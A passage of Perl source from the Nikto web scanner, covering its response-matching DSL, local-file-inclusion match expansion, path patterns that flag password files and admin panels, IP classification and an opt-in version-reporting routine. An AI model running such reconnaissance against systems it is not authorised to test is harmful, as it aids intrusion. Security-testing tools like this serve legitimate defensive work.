$VARIABLES{'version'})) {\n        my $defer = $VARIABLES{'deferout'};\n        $VARIABLES{'deferout'} = 0;\n\n        # Check if git install\n        my $is_git = (-d '.git' || -d '../.git' || -d '../../.git');\n        if ($is_git) {\n            nprint(\n                \"+ Your Nikto installation is out of date. Please run 'git pull' to update to the latest version of Nikto.\"\n                );\n        }\n        else {\n            nprint(\"+ Your Nikto installation is out of date.\");\n        }\n        $VARIABLES{'deferout'} = $defer;\n    }\n}\n#######################################################################\n# Expand @LFI() in DSL with platform-specific matchers\nsub expand_lfi_dsl {\n    my ($dsl) = @_;\n\n    if ($dsl =~ /@?LFI\\(\\)/) {\n\n        # Local variables for LFI matching\n        my $lfi_match_win = $VARIABLES{'@LFIMATCHWIN'} || '';\n        my $lfi_match_nix = $VARIABLES{'@LFIMATCHNIX'} || '';\n\n        # If both are empty, return original DSL\n        if (!$lfi_match_win && !$lfi_match_nix) {\n            return $dsl;\n        }\n\n        # Build the OR pattern: (@LFIMATCHWIN|@LFIMATCHNIX)\n        # Use string concatenation to preserve backslashes and avoid interpolation issues\n        my $replacement;\n        if ($lfi_match_win && $lfi_match_nix) {\n            $replacement = '(' . $lfi_match_win . '|' . $lfi_match_nix . ')';\n        }\n        elsif ($lfi_match_win) {\n            $replacement = $lfi_match_win;\n        }\n        else {\n            $replacement = $lfi_match_nix;\n        }\n\n        # Replace @LFI() with the expanded pattern\n        # Use \\Q...\\E to quote the replacement and prevent any regex interpretation\n        # But we need the | and && to work, so we can't quote everything\n        # Instead, just do the substitution - the replacement side doesn't interpret regex\n        $dsl =~ s/@?LFI\\(\\)/$replacement/g;\n    }\n\n    return $dsl;\n}\n\nsub build_matcher {\n    my ($dsl, $checkid) = @_;\n\n    # Return early if DSL is undefined or empty\n    return sub { return (0, []); }\n      unless defined $dsl && length $dsl;\n\n    # Expand @LFI() if present\n    my $expanded_dsl = expand_lfi_dsl($dsl);\n\n    # Use cached parser for speed\n    my $parsed = $DSL_CACHE{$expanded_dsl};\n    if (!$parsed) {\n        $parsed = parse_dsl($expanded_dsl);\n        $DSL_CACHE{$expanded_dsl} = $parsed;\n    }\n\n    return sub {\n        my ($code, $body, $headers, $cookies) = @_;\n        my @captured_groups = ();    # Store captured groups for extraction\n\n        # --- CODE NEGATIVES ---\n        for my $re (@{ $parsed->{code_neg} }) {\n            return (0, []) if $code =~ $re;\n        }\n\n        # --- CODE POSITIVES ---\n        for my $re (@{ $parsed->{code_pos} }) {\n            if ($code =~ $re) {\n\n                # Capture groups if they exist\n                push @captured_groups, $1, $2, $3, $4, $5, $6, $7, $8, $9;\n            }\n            else {\n                return (0, []);\n            }\n        }\n\n        # --- HEADER NEGATIVES ---\n        for my $h (@{ $parsed->{header_neg} }) {\n            if (exists $headers->{ $h->{name} }) {\n\n                # If regex defined, header must NOT match\n                return (0, []) if $h->{regex} && $headers->{ $h->{name} } =~ $h->{regex};\n\n                # If no regex, header must not exist\n                return (0, []) unless $h->{regex};\n            }\n        }\n\n        # --- HEADER POSITIVES ---\n        for my $h (@{ $parsed->{header_pos} }) {\n\n            # Must exist\n            return (0, []) unless exists $headers->{ $h->{name} };\n\n            # Must match regex if defined\n            if ($h->{regex}) {\n                if ($headers->{ $h->{name} } =~ $h->{regex}) {\n\n                    # Capture groups if they exist\n                    push @captured_groups, $1, $2, $3, $4, $5, $6, $7, $8, $9;\n                }\n                else {\n                    return (0, []);\n                }\n            }\n        }\n\n        # --- COOKIE NEGATIVES ---\n        for my $c (@{ $parsed->{cookie_neg} }) {\n            if (exists $cookies->{ $c->{name} }) {\n\n                # If regex defined, cookie must NOT match\n                return (0, []) if $c->{regex} && $cookies->{ $c->{name} } =~ $c->{regex};\n\n                # If no regex, cookie must not exist\n                return (0, []) unless $c->{regex};\n            }\n        }\n\n        # --- COOKIE POSITIVES ---\n        for my $c (@{ $parsed->{cookie_pos} }) {\n\n            # Must exist\n            return (0, []) unless exists $cookies->{ $c->{name} };\n\n            # Must match regex if defined\n            if ($c->{regex}) {\n                if ($cookies->{ $c->{name} } =~ $c->{regex}) {\n\n                    # Capture groups if they exist\n                    push @captured_groups, $1, $2, $3, $4, $5, $6, $7, $8, $9;\n                }\n                else {\n                    return (0, []);\n                }\n            }\n        }\n\n        # --- BODY NEGATIVES ---\n        for my $re (@{ $parsed->{body_neg} }) {\n            return (0, []) if $body =~ $re;\n        }\n\n        # --- BODY POSITIVES ---\n        for my $re (@{ $parsed->{body_pos} }) {\n            if ($body =~ $re) {\n\n                # Capture groups if they exist\n                push @captured_groups, $1, $2, $3, $4, $5, $6, $7, $8, $9;\n            }\n            else {\n                return (0, []);\n            }\n        }\n\n        # --- OR GROUPS ---\n        # Each OR group must have at least one alternative that matches\n        if (exists $parsed->{or_groups} && @{ $parsed->{or_groups} }) {\n            for my $or_group (@{ $parsed->{or_groups} }) {\n                my $or_matched = 0;\n                foreach my $alt_parsed (@$or_group) {\n\n                    # Build a temporary matcher for this alternative\n                    my $alt_matcher = sub {\n                        my ($alt_code, $alt_body, $alt_headers, $alt_cookies) = @_;\n                        my @alt_captures = ();\n\n                        # Check all conditions in this alternative\n                        for my $re (@{ $alt_parsed->{code_neg} }) {\n                            return (0, []) if $alt_code =~ $re;\n                        }\n                        for my $re (@{ $alt_parsed->{code_pos} }) {\n                            return (0, []) unless $alt_code =~ $re;\n                        }\n                        for my $h (@{ $alt_parsed->{header_neg} }) {\n                            if (exists $alt_headers->{ $h->{name} }) {\n                                return (0, [])\n                                  if $h->{regex} && $alt_headers->{ $h->{name} } =~ $h->{regex};\n                                return (0, []) unless $h->{regex};\n                            }\n                        }\n                        for my $h (@{ $alt_parsed->{header_pos} }) {\n                            return (0, []) unless exists $alt_headers->{ $h->{name} };\n                            if ($h->{regex}) {\n                                return (0, []) unless $alt_headers->{ $h->{name} } =~ $h->{regex};\n                            }\n                        }\n                        for my $c (@{ $alt_parsed->{cookie_neg} }) {\n                            if (exists $alt_cookies->{ $c->{name} }) {\n                                return (0, [])\n                                  if $c->{regex} && $alt_cookies->{ $c->{name} } =~ $c->{regex};\n                                return (0, []) unless $c->{regex};\n                            }\n                        }\n                        for my $c (@{ $alt_parsed->{cookie_pos} }) {\n                            return (0, []) unless exists $alt_cookies->{ $c->{name} };\n                            if ($c->{regex}) {\n                                return (0, []) unless $alt_cookies->{ $c->{name} } =~ $c->{regex};\n                            }\n                        }\n                        for my $re (@{ $alt_parsed->{body_neg} }) {\n                            return (0, []) if $alt_body =~ $re;\n                        }\n                        for my $re (@{ $alt_parsed->{body_pos} }) {\n                            return (0, []) unless $alt_body =~ $re;\n                        }\n\n                        # Check nested OR groups in this alternative\n                        if (exists $alt_parsed->{or_groups} && @{ $alt_parsed->{or_groups} }) {\n                            for my $nested_or_group (@{ $alt_parsed->{or_groups} }) {\n                                my $nested_or_matched = 0;\n                                foreach my $nested_alt (@$nested_or_group) {\n                                    my $nested_alt_matcher = sub {\n                                        my ($n_code, $n_body, $n_headers, $n_cookies) = @_;\n                                        for my $re (@{ $nested_alt->{code_neg} }) {\n                                            return (0, []) if $n_code =~ $re;\n                                        }\n                                        for my $re (@{ $nested_alt->{code_pos} }) {\n                                            return (0, []) unless $n_code =~ $re;\n                                        }\n                                        for my $h (@{ $nested_alt->{header_neg} }) {\n                                            if (exists $n_headers->{ $h->{name} }) {\n                                                return (0, [])\n                                                  if $h->{regex}\n                                                  && $n_headers->{ $h->{name} } =~ $h->{regex};\n                                                return (0, []) unless $h->{regex};\n                                            }\n                                        }\n                                        for my $h (@{ $nested_alt->{header_pos} }) {\n                                            return (0, []) unless exists $n_headers->{ $h->{name} };\n                                            if ($h->{regex}) {\n                                                return (0, [])\n                                                  unless $n_headers->{ $h->{name} } =~ $h->{regex};\n                                            }\n                                        }\n                                        for my $c (@{ $nested_alt->{cookie_neg} }) {\n                                            if (exists $n_cookies->{ $c->{name} }) {\n                                                return (0, [])\n                                                  if $c->{regex}\n                                                  && $n_cookies->{ $c->{name} } =~ $c->{regex};\n                                                return (0, []) unless $c->{regex};\n                                            }\n                                        }\n                                        for my $c (@{ $nested_alt->{cookie_pos} }) {\n                                            return (0, []) unless exists $n_cookies->{ $c->{name} };\n                                            if ($c->{regex}) {\n                                                return (0, [])\n                                                  unless $n_cookies->{ $c->{name} } =~ $c->{regex};\n                                            }\n                                        }\n                                        for my $re (@{ $nested_alt->{body_neg} }) {\n                                            return (0, []) if $n_body =~ $re;\n                                        }\n                                        for my $re (@{ $nested_alt->{body_pos} }) {\n                                            return (0, []) unless $n_body =~ $re;\n                                        }\n                                        return (1, []);\n                                    };\n                                    my ($n_match, $n_caps) =\n                                      $nested_alt_matcher->(\n                                                    $alt_code, $alt_body, $alt_headers, $alt_cookies\n                                                    );\n                                    if ($n_match) {\n                                        $nested_or_matched = 1;\n                                        push @alt_captures, @$n_caps if $n_caps;\n                                        last;\n                                    }\n                                }\n                                return (0, []) unless $nested_or_matched;\n                            }\n                        }\n                        return (1, \\@alt_captures);\n                    };\n\n                    # Test this alternative\n                    my ($alt_match, $alt_caps) = $alt_matcher->($code, $body, $headers, $cookies);\n                    if ($alt_match) {\n                        $or_matched = 1;\n                        push @captured_groups, @$alt_caps if $alt_caps;\n                        last;    # One match is enough for OR\n                    }\n                }\n\n                # If no alternative matched, the OR group fails\n                return (0, []) unless $or_matched;\n            }\n        }\n\n        # Filter out undefined captured groups and build final array\n        my @final_captures = ();\n        for my $capture (@captured_groups) {\n            push @final_captures, $capture if defined $capture;\n        }\n\n        return (1, \\@final_captures);    # All conditions passed, return captures\n    };\n}\n#######################################################################\nsub path_matcher {\n    my ($files_ref, $dirs_ref, $links_ref) = @_;\n\n    # Map file patterns to variable names\n    # var can be a string or array ref for multiple variables\n    my @file_patterns = ({ pattern => qr/pass/i, var => '@PASSWORDFILES' },);\n\n    # Process files\n    if ($files_ref) {\n        foreach my $file (keys %{$files_ref}) {\n            my $raw = $file;\n            $file = validate_and_fix_regex($file);\n\n            foreach my $check (@file_patterns) {\n                if ($file =~ $check->{pattern}) {\n                    my @vars = ref($check->{var}) eq 'ARRAY' ? @{ $check->{var} } : ($check->{var});\n                    foreach my $var (@vars) {\n                        if ($VARIABLES{$var} !~ /$file/i) {\n                            $VARIABLES{$var} .= \" $raw\";\n                        }\n                    }\n                }\n            }\n        }\n    }\n\n    # Map directory patterns to variable names\n    # var can be a string or array ref for multiple variables\n    my @dir_patterns = ({ pattern => qr/cgi/i,              var => '@CGIDIRS' },\n                        { pattern => qr/forum/i,            var => [ '@NUKE', '@VBULLETIN' ] },\n                        { pattern => qr/pass/i,             var => '@PASSWORDDIRS' },\n                        { pattern => qr/nuke/i,             var => '@NUKE' },\n                        { pattern => qr/admin/i,            var => '@ADMIN' },\n                        { pattern => qr/phpmy/i,            var => '@PHPMYADMIN' },\n                        { pattern => qr/fck/i,              var => '@FCKEDITOR' },\n                        { pattern => qr/crystal/i,          var => '@CRYSTALREPORTS' },\n                        { pattern => qr/struts/i,           var => '@STRUTSACTIONS' },\n                        { pattern => qr/(wordpress|wp)/i,   var => '@WORDPRESS' },\n                        { pattern => qr/php/i,              var => '@PHPINFODIRS' },\n                        { pattern => qr/phpinfo/i,          var => '@PHPINFOFILES' },\n                        { pattern => qr/mantis/i,           var => '@MANTIS' },\n                        { pattern => qr/dokuwiki/i,         var => '@DOKUWIKI' },\n                        { pattern => qr/rockmongo/i,        var => '@ROCKMONGO' },\n                        { pattern => qr/magento/i,          var => '@MAGENTO' },\n                        { pattern => qr/(vb|vbulletin)/i,   var => '@VBULLETIN' },\n                        { pattern => qr/jenkins/i,          var => '@JENKINS' },\n                        { pattern => qr/symphony|contrib/i, var => '@SYMPHONY' },\n                        );\n\n    # Process directories\n    if ($dirs_ref) {\n        foreach my $dir (keys %{$dirs_ref}) {\n\n            # Directory is already validated before being stored, just use it directly\n            foreach my $check (@dir_patterns) {\n                if ($dir =~ $check->{pattern}) {\n                    my @vars = ref($check->{var}) eq 'ARRAY' ? @{ $check->{var} } : ($check->{var});\n                    foreach my $var (@vars) {\n                        if ($VARIABLES{$var} !~ /$dir/i) {\n                            $VARIABLES{$var} .= \" $dir\";\n                        }\n                    }\n                }\n            }\n        }\n    }\n\n    # Map link patterns to variable names\n    # var can be a string or array ref for multiple variables\n    my @link_patterns = ({ pattern => qr/\\.action(\\?|$)/i, var => '@STRUTSACTIONS' },);\n\n    # Process full links\n    if ($links_ref) {\n        foreach my $link (keys %{$links_ref}) {\n            $link = validate_and_fix_regex($link);\n            foreach my $check (@link_patterns) {\n                if ($link =~ $check->{pattern}) {\n                    my @vars = ref($check->{var}) eq 'ARRAY' ? @{ $check->{var} } : ($check->{var});\n                    foreach my $var (@vars) {\n                        if ($VARIABLES{$var} !~ /$link/i) {\n                            $VARIABLES{$var} .= \" $link\";\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n\n#######################################################################\n# extract IP like strings and return an array\nsub get_ips {\n    my $string   = shift || return;\n    my $ip_regex = qr/(?:\\b|[^0-9v])($LW2::IPv4_re|$LW2::IPv6_re_inc_zoneid)(?:\\b|[^0-9])/;\n    return $string =~ /$ip_regex/g;\n}\n\n#######################################################################\n# Check an IP's validity. Returns booleans for: validity, internal, loopback\nsub is_ip {\n    my $ip       = $_[0] || return 0, 0, 0;\n    my $internal = 0;\n    my $loopback = 0;\n\n    # This is a little hacky but prevents Cloudflare cookies and headers from reporting\n    if ($ip eq '1.0.1.1') {\n        return 0, 0, 0;\n    }\n\n    if ($ip =~ /^$LW2::IPv4_re$/) {\n\n        # check for internal\n        if ($ip =~ /^(?:10|192\\.168|172\\.(?:1[6-9]|2\\d|3[01]))\\./) { $internal = 1; }\n\n        # check for loopback\n        if ($ip eq '127.0.0.1') { $loopback = 1; }\n\n    }\n    elsif ($ip =~ /^$LW2::IPv6_re_inc_zoneid(?:\\/[0-9]+)?$/) {\n\n        # check for internal\n        if ($ip =~ /^(?:10|192\\.168|172\\.(?:1[6-9]|2\\d|3[01]))\\./) { $internal = 1; }\n\n        if ($ip =~ /^(?:fe80     # is a link local unicast address\n                                          |ff0[1-8] # is a multicast address\n                                          |fc00     # private network\n        ):/ix\n            ) {\n            $internal = 1;\n        }\n\n        # lastly, loopback?\n        # This is a bit rough 'n' ready, could do with some finesse\n        if ($ip =~ /^[01:]+(?:\\/[0-9]+)?$/) { $loopback = 1; }\n\n    }\n    else {\n        return 0, $internal, $loopback;\n    }\n    return 1, $internal, $loopback;\n}\n\n#######################################################################\nsub parse_dsl {\n    my ($dsl) = @_;\n\n    die \"Empty DSL string\" unless defined $dsl && length $dsl;\n\n    # Split top-level conditions on && and ||, but not inside parentheses\n    # This preserves OR patterns like (PATTERN1|PATTERN2&&PATTERN3)\n    # First, check if there's a top-level || (OR operator)\n    my $has_top_level_or = 0;\n    my $depth            = 0;\n    for (my $i = 0 ; $i < length($dsl) ; $i++) {\n        my $char       = substr($dsl, $i, 1);\n        my $next_char  = ($i < length($dsl) - 1) ? substr($dsl, $i + 1, 1) : '';\n        my $prev_char  = ($i > 0)                ? substr($dsl, $i - 1, 1) : '';\n        my $is_escaped = ($prev_char eq '\\\\');\n\n        if (!$is_escaped) {\n            if ($char eq '(') {\n                $depth++;\n            }\n            elsif ($char eq ')') {\n                $depth--;\n            }\n            elsif ($char eq '|' && $next_char eq '|' && $depth == 0) {\n                $has_top_level_or = 1;\n                last;\n            }\n        }\n    }\n\n    # If we have a top-level ||, split on it and wrap in OR group\n    if ($has_top_level_or) {\n        my @or_alternatives = ();\n        $depth = 0;\n        my $current_alt = '';\n        for (my $i = 0 ; $i < length($dsl) ; $i++) {\n            my $char       = substr($dsl, $i, 1);\n            my $next_char  = ($i < length($dsl) - 1) ? substr($dsl, $i + 1, 1) : '';\n            my $prev_char  = ($i > 0)                ? substr($dsl, $i - 1, 1) : '';\n            my $is_escaped = ($prev_char eq '\\\\');\n\n            if (!$is_escaped) {\n                if ($char eq '|' && $next_char eq '|' && $depth == 0) {\n                    push @or_alternatives, $current_alt if $current_alt ne '';\n                    $current_alt = '';\n                    $depth       = 0;    # Reset depth for new alternative\n                    $i += 1; # Skip first |, loop will auto-increment to skip second |\n                    next;    # Continue to next iteration (will auto-increment i, skipping second |)\n                }\n                elsif ($char eq '(') {\n                    $depth++;\n                    $current_alt .= $char;\n                }\n                elsif ($char eq ')') {\n                    $depth--;\n                    $current_alt .= $char;\n                }\n                else {\n                    $current_alt .= $char;\n                }\n            }\n            else {\n                $current_alt .= $char;\n            }\n        }\n        push @or_alternatives, $current_alt if $current_alt ne '';\n\n        # Parse each alternative and create an OR group\n        my @or_parsed = ();\n        foreach my $alt (@or_alternatives) {\n            $alt =~ s/^\\s+|\\s+$//g;\n            next unless $alt;\n\n     # If alternative doesn't start with a known type prefix or OR group, assume it's a BODY pattern\n            if ($alt !~ /^(CODE|BODY|HEADER|COOKIE|!CODE|!BODY|!HEADER|!COOKIE):/i && $alt !~ /^\\(/)\n            {\n                $alt = \"BODY:$alt\";\n            }\n            my $alt_parsed = parse_dsl($alt);\n            push @or_parsed, $alt_parsed;\n        }\n\n        # Return a compiled structure with just the OR group\n        my %compiled = (code_pos   => [],\n                        code_neg   => [],\n                        body_pos   => [],\n                        body_neg   => [],\n                        header_pos => [],\n                        header_neg => [],\n                        cookie_pos => [],\n                        cookie_neg => [],\n                        or_groups  => [ \\@or_parsed ],\n                        );\n        return \\%compiled;\n    }\n\n    # No top-level ||, proceed with normal && splitting\n    my @tokens = ();\n    $depth = 0;\n    my $current_token = '';\n    my $i             = 0;\n    my $len           = length($dsl);\n\n    while ($i < $len) {\n        my $char      = substr($dsl, $i, 1);\n        my $next_char = ($i < $len - 1) ? substr($dsl, $i + 1, 1) : '';\n        my $prev_char = ($i > 0)        ? substr($dsl, $i - 1, 1) : '';\n\n        # Check if && is escaped (previous char is backslash, similar to original regex)\n        my $is_escaped = ($prev_char eq '\\\\');\n\n        if (!$is_escaped) {\n            if ($char eq '(') {\n                $depth++;\n                $current_token .= $char;\n            }\n            elsif ($char eq ')') {\n                $depth--;\n                $current_token .= $char;\n            }\n            elsif ($char eq '&' && $next_char eq '&' && $depth == 0) {\n\n                # Found top-level && delimiter\n                push @tokens, $current_token if $current_token ne '';\n                $current_token = '';\n                $i += 2;    # Skip both & characters\n                next;\n            }\n            else {\n                $current_token .= $char;\n            }\n        }\n        else {\n            # Escaped character, just add it\n            $current_token .= $char;\n        }\n        $i++;\n    }\n    push @tokens, $current_token if $current_token ne '';\n\n    my %compiled = (code_pos   => [],\n                    code_neg   => [],\n                    body_pos   => [],\n                    body_neg   => [],\n                    header_pos => [],\n                    header_neg => [],\n                    cookie_pos => [],\n                    cookie_neg => [],\n                    or_groups  => [],    # Store OR patterns for special handling\n                    );\n\n    foreach my $token (@tokens) {\n        $token =~ s/^\\s+|\\s+$//g;                     # trim whitespace\n        $token =~ s/,\\s*$// if length($token) > 1;    # trim trailing comma\n        next unless $token;\n\n        # Check if this is an OR pattern (starts with ( and ends with ))\n        # Use regex to check if it's a properly formed OR pattern\n        if ($token =~ /^\\((.*)\\)$/) {\n\n            # Verify balanced parentheses in the content (the outer parens are already matched)\n            my $or_content = $1;\n            my $depth      = 0;\n            my $valid_or   = 1;\n            for my $i (0 .. length($or_content) - 1) {\n                my $char       = substr($or_content, $i, 1);\n                my $prev_char  = ($i > 0) ? substr($or_content, $i - 1, 1) : '';\n                my $is_escaped = ($prev_char eq '\\\\');\n\n                if (!$is_escaped) {\n                    if ($char eq '(') {\n                        $depth++;\n                    }\n                    elsif ($char eq ')') {\n                        $depth--;\n                        if ($depth < 0) {\n                            $valid_or = 0;\n                            last;\n                        }\n                    }\n                }\n            }\n\n            # Content must have balanced parentheses\n            if ($valid_or && $depth == 0) {\n\n                # Split on | but not escaped |\n                my @alternatives = split /(?<!\\\\)\\|/, $or_content;\n\n                # Parse each alternative as a separate DSL expression\n                my @or_parsed = ();\n                foreach my $alt (@alternatives) {\n                    $alt =~ s/^\\s+|\\s+$//g;\n                    next unless $alt;\n\n                    # Recursively parse this alternative\n                    my $alt_parsed = parse_dsl($alt);\n                    push @or_parsed, $alt_parsed;\n                }\n\n                # Store the OR group\n                push @{ $compiled{or_groups} }, \\@or_parsed;\n                next;\n            }\n            else {\n                # Token looks like an OR pattern but has unbalanced parentheses\n                die \"Invalid DSL token: OR pattern has unbalanced parentheses: $token\";\n            }\n        }\n        elsif ($token =~ /^\\(/) {\n\n            # Token starts with ( but doesn't match OR pattern format\n            # Show token details for debugging\n            my $token_len  = length($token);\n            my $first_char = substr($token, 0, 1);\n            my $last_char  = substr($token, -1);\n            die\n              \"Invalid DSL token: token starts with '(' but is not a properly formed OR pattern (must start with '(' and end with ')'): length=$token_len, first='$first_char', last='$last_char', token='$token'\";\n        }\n\n        # Check negation\n        my $neg = 0;\n        if ($token =~ /^!/) {\n            $neg   = 1;\n            $token = substr($token, 1);\n        }\n\n        # Skip @LFI() tokens - they are placeholders that will be expanded at runtime\n        # This can happen if variables aren't loaded yet during validation\n        if ($token =~ /^@?LFI\\(\\)$/) {\n            next;\n        }\n\n        # TYPE:VALUE split (only first colon)\n        my ($type, $pattern) = split /:/, $token, 2;\n        die \"Invalid DSL token: $token\" unless defined $type && defined $pattern;\n        $type = uc($type);\n\n        if ($type eq 'CODE') {\n            push @{ $neg ? $compiled{code_neg} : $compiled{code_pos} }, compile_regex($pattern);\n\n        }\n        elsif ($type eq 'BODY') {\n            die \"Empty BODY pattern in DSL\" if $pattern eq '';\n            my $compiled = compile_regex($pattern);\n            push @{ $neg ? $compiled{body_neg} : $compiled{body_pos} }, $compiled;\n\n        }\n        elsif ($type eq 'HEADER') {\n            my ($hname, $hval) = split /:/, $pattern, 2;\n            die \"Missing HEADER name: $token\" unless defined $hname && length $hname;\n            $hname =~ s/^\\s+|\\s+$//g;\n            $hval = '' unless defined $hval;\n            $hval =~ s/^\\s+//;\n            my $re = length($hval) ? compile_regex($hval) : undef;\n            push @{ $neg ? $compiled{header_neg} : $compiled{header_pos} },\n              { name  => lc($hname),\n                regex => $re,\n                };\n\n        }\n        elsif ($type eq 'COOKIE') {\n            my ($cname, $cval) = split /:/, $pattern, 2;\n            die \"Missing COOKIE name: $token\" unless defined $cname && length $cname;\n            $cname =~ s/^\\s+|\\s+$//g;\n            $cval = '' unless defined $cval;\n            $cval =~ s/^\\s+//;\n            my $re = length($cval) ? compile_regex($cval) : undef;\n            push @{ $neg ? $compiled{cookie_neg} : $compiled{cookie_pos} },\n              { name  => lc($cname),\n                regex => $re,\n                };\n\n        }\n        else {\n            die \"Unknown DSL type: $type\";\n        }\n    }\n\n    return \\%compiled;\n}\n\n#######################################################################\nsub compile_regex {\n    my ($pattern) = @_;\n\n    # Remove escapes for our delimiters (but preserve other escapes like \\. \\d etc)\n    # However, don't unescape pipes inside escaped parentheses \\( \\) as those are literal\n    # Protect pipes inside \\( \\) blocks by temporarily replacing them\n    my @protected_blocks = ();\n    my $block_idx        = 0;\n    while ($pattern =~ /(\\\\\\([^)]*\\\\\\))/g) {\n        my $block       = $1;\n        my $placeholder = \"___PROTECTED_BLOCK_${block_idx}___\";\n        $protected_blocks[$block_idx] = $block;\n        $pattern =~ s/\\Q$block\\E/$placeholder/;\n        $block_idx++;\n    }\n\n    # Now unescape delimiters outside protected blocks\n    $pattern =~ s/\\\\([|!&:])/$1/g;\n\n    # Restore protected blocks (with their escaped pipes intact)\n    for (my $i = 0 ; $i < @protected_blocks ; $i++) {\n        my $placeholder = \"___PROTECTED_BLOCK_${i}___\";\n        $pattern =~ s/\\Q$placeholder\\E/$protected_blocks[$i]/;\n    }\n\n    # Fix escaped quotes - convert \\\" to \" (escaped quotes in CSV become literal quotes in regex)\n    # This prevents \"Trailing \\ in regex\" errors when patterns end with \\\"\n    $pattern =~ s/\\\\\"/\"/g;\n\n    # Fix trailing backslashes - if pattern ends with \\ (not part of an escape sequence), double it\n    # This prevents \"Trailing \\ in regex\" errors (e.g., \"c:\\\" becomes \"c:\\\\\")\n    # Only do this if the backslash is not already escaped (not \"\\\\\")\n    if ($pattern =~ /[^\\\\]\\\\$/) {\n        $pattern =~ s/([^\\\\])\\\\$/$1\\\\\\\\/;    # Double the trailing backslash\n    }\n    elsif ($pattern =~ /^\\\\$/) {\n\n        # Pattern is just a single backslash\n        $pattern = '\\\\\\\\';\n    }\n\n    # Handle case-insensitive flag\n    my $mod = '';\n    if ($pattern =~ s/^\\(\\?i\\)//) {\n        $mod = '(?i)';\n    }\n\n    # Compile the regex pattern\n    my $re = eval { qr/$mod$pattern/ };\n    die \"Invalid regex '$pattern': $@\" if $@;\n\n    return $re;\n}\n\n#######################################################################\nsub parse_csv {\n    my $text = $_[0] || return;\n    my @new  = ();\n    push(@new, $+) while $text =~ m{\n      \"([^\\\"\\\\]*(?:\\\\.[^\\\"\\\\]*)*)\",?\n       |  ([^,]+),?\n       | ,\n   }gx;\n    push(@new, undef) if substr($text, -1, 1) eq ',';\n    return @new;\n}\n#######################################################################\nsub check_ssl_support {\n    LW2::init_ssl_engine();\n    my ($avail, $lib, $ver) = LW2::ssl_is_available();\n    if (!$avail) {\n        nprint(\"+ WARNING: SSL: support not available.\");\n    }\n}\n\n#######################################################################\nsub version {\n    nprint(\"$VARIABLES{'name'} $VARIABLES{'version'} (LW $LW2::VERSION)\");\n    exit 0;\n}\n\n#######################################################################\nsub send_updates {\n    return if ($CONFIGFILE{'UPDATES'} !~ /yes|auto/i);\n    my (@MARKS) = @_;\n    my ($updated_version, $answer, $code, $upd_enc);\n    my $have_updates = 0;\n\n    foreach my $mark (@MARKS) {\n        foreach my $component (keys %{ $mark->{'components'} }) {\n            if ($mark->{'components'}->{$component} eq 2) {\n                if    ($component !~ /\\d/)                               { next; }\n                elsif ($component =~ /^(?:\\(?Win32\\)?|Linux-Mandrake$)/) { next; }\n                elsif ($component eq \"\")                                 { next; }\n                $have_updates = 1;\n                $updated_version .= \"$component \";\n            }\n        }\n    }\n\n    if ((!$have_updates) || ($updated_version eq \"\")) { return; }\n\n    $updated_version =~ s/\\s+$//;\n    $updated_version =~ s/^\\s+//;\n\n    if ($CONFIGFILE{'UPDATES'} eq \"auto\") {\n        $answer = \"y\";\n    }\n    else {\n        $answer = read_data(\n            \"\\n\n      *********************************************************************\n      Portions of the server's headers ($updated_version) are not in\n      the Nikto \"\n              . $VARIABLES{'version'}\n              . \" database or are newer than the known string. Would you like\n      to submit this information (*no server specific data*) to CIRT.net\n      for a Nikto update (or you may email to sullo\\@cirt.net) (y/n)? \", \"\"\n              );\n    }\n\n    if ($answer !~ /y/i) { return; }\n\n    # set up our mark\n    my %mark = ('ident' => $CONFIGFILE{CIRT},\n                'ssl'   => 1,\n                'port'  => 443\n                );\n\n    ($mark{'hostname'}, $mark{'ip'}, $mark{'display_name'}) = resolve($CONFIGFILE{CIRT}, 0);\n\n    $upd_enc = LW2::encode_base64($updated_version);\n    chomp($upd_enc);\n\n    # Use libwhisker directly instead of nfetch to avoid reporting on update target\n    my (%request, %response);\n    setup_hash(\\%request, \\%mark, \"\");\n    $request{'whisker'}->{'uri'}    = \"/nikto-updates.php?version=$upd_enc\";\n    $request{'whisker'}->{'method'} = \"GET\";\n    $request{'whisker'}->{'host'}   = $mark{'hostname'};\n    $request{'Accept'}              = '*/*';\n    $request{'User-Agent'}          = get_ua();\n\n    LW2::http_fixup_request(\\%request);\n\n    LW2::http_do_request_timeout(\\%request, \\%response);\n    $code    = $response{'whisker'}->{'code'};\n    $content = $response{'whisker'}->{'data'};\n\n    if ($code eq 407) {\n        if ($CONFIGFILE{PROXYUSER} eq \"\") {\n            $CONFIGFILE{PROXYUSER} = read_data(\"Proxy ID: \",   \"\");\n            $CONFIGFILE{PROXYPASS} = read_data(\"Proxy Pass: \", \"noecho\");\n        }\n        LW2::http_do_request_timeout(\\%request, \\%response);\n        $code    = $response{'whisker'}->{'code'};\n        $content = $response{'whisker'}->{'data'};\n    }\n\n    if ($code eq \"\") {\n        LW2::http_close(\\%request);\n\n        # Use CIRT config hostname for fallback\n        my ($fallback_hostname, $fallback_ip, $fallback_display) = resolve($CONFIGFILE{CIRT}, 0);\n        $mark{'ip'} = $fallback_ip;\n        $request{'whisker'}->{'host'} = $fallback_hostname;\n        LW2::http_fixup_request(\\%request);\n        LW2::http_do_request_timeout(\\%request, \\%response);\n        $code    = $response{'whisker'}->{'code'};\n        $content = $response{'whisker'}->{'data'};\n    }\n\n    if (($code != 200) || ($content !~ /SUCCESS/)) {\n        nprint(\"+ ERROR: $code -> \"\n                 . $response{'location'}\n                 . \"\\n+ ERROR: Update failed, please notify sullo\\@cirt.net of the previous line.\",\n               \"\",\n               ($mark{'hostname'}, $mark{'ip'}, $mark{'display_name'})\n               );\n    }\n    else {\n        nprint(\"- Sent updated info to cirt.net -- Thank you!\");\n    }\n\n    return;\n}\n\n#######################################################################\nsub usage {\n    print \"\n   Options:\n       -Add-header         Add HTTP headers (can be used multiple times, one per header pair)\n       -ask+               Whether to ask about submitting updates\n                               yes   Ask about each (default)\n                               no    Don't ask, don't send\n                               auto  Don't ask, just send\n       -check6             Check if IPv6 is working (connects to ipv6.google.com or value set in nikto.conf)\n       -Cgidirs+           Scan these CGI dirs: \\\"none\\\", \\\"all\\\", or values like \\\"/cgi/ /cgi-a/\\\"\n       -config+            Use this config file\n       -Display+           Turn on/off display outputs:\n                               1     Show redirects\n                               2     Show cookies received\n                               3     Show all 200/OK responses\n                               4     Show URLs which require authentication\n                               D     Debug output\n                               E     Display all HTTP errors\n                               P     Print progress to STDOUT\n                               S     Scrub output of IPs and hostnames\n                               V     Verbose output\n       -dbcheck           Check database and other key files for syntax errors\n       -evasion+          Encoding technique:\\n\";\n\n    foreach my $k (sort keys %{ 